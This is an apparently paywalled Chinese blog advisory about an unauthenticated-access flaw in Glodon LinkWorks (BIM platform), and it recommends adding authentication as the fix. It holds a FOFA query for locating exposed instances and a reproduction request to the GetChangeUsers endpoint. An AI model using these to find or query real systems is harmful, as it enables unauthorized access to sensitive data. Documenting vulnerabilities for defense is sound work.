超级会员免费看
本文介绍了广联达LinkWorks(GlinkLink或GTP-LinkWorks)的一个安全漏洞,该BIM协同平台存在GetChangeUsers接口未授权访问的问题,允许攻击者获取系统敏感信息。复现环境涉及FOFA查询条件,修复建议是增加接口的身份认证措施。
产品介绍
广联达 LinkWorks(也称为 GlinkLink 或 GTP-LinkWorks)是广联达公司(Glodon)开发的一种BIM(建筑信息模型)协同平台。广联达是中国领先的数字建造技术提供商之一,专注于为建筑、工程和建筑设计行业提供数字化解决方案。
漏洞描述
由于广联达 GetChangeUsers 接口处设置不当,未经身份认证的攻击者通过构造特殊的数据包,可以访问系统敏感信息。
复现环境
FOFA:body=”Services/Identification/login.ashx” || header=”Services/Identification/login.ashx” || banner=”Services/Identification/login.ashx”
漏洞复现
http://your-ip/Org/service/Service.asmx/GetChangeUsers?strDate=2999-01-01<
订阅专栏 解锁全文
733
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
